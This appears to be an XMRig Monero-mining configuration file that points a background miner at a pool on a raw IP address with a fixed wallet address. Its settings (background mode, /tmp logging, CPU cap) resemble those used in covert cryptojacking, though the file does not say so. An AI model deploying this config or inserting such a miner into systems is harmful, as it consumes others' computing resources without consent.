{
    "algo": "cryptonight",
    "av": 2,
    "background": true,
    "colors": true,
    "cpu-affinity": null,
    "cpu-priority": null,
    "donate-level": 0,
    "log-file": "/tmp/xmrig.log",
    "max-cpu-usage": 80,
    "print-time": 60,
    "retries": 5,
    "retry-pause": 5,
    "safe": false,
    "syslog": false,
    "threads": 1,
    "pools": [
        {
            "url": "192.110.160.114:5555",
       	    "user":"47AvjyMkQy6JFXQo7NDJ6QXaCawzc637jdcAG6BJUBofV8mGiPg2uKqhwFeuTm7UBo3dDBEaAd9w2EynVBsE6s615FqmDhK",
            "pass": "LightSail",
            "keepalive": true,
            "nicehash": false,
            "variant": -1
        }
    ],
    "api": {
        "port": 0,
        "access-token": null,
        "worker-id": null
    }
}
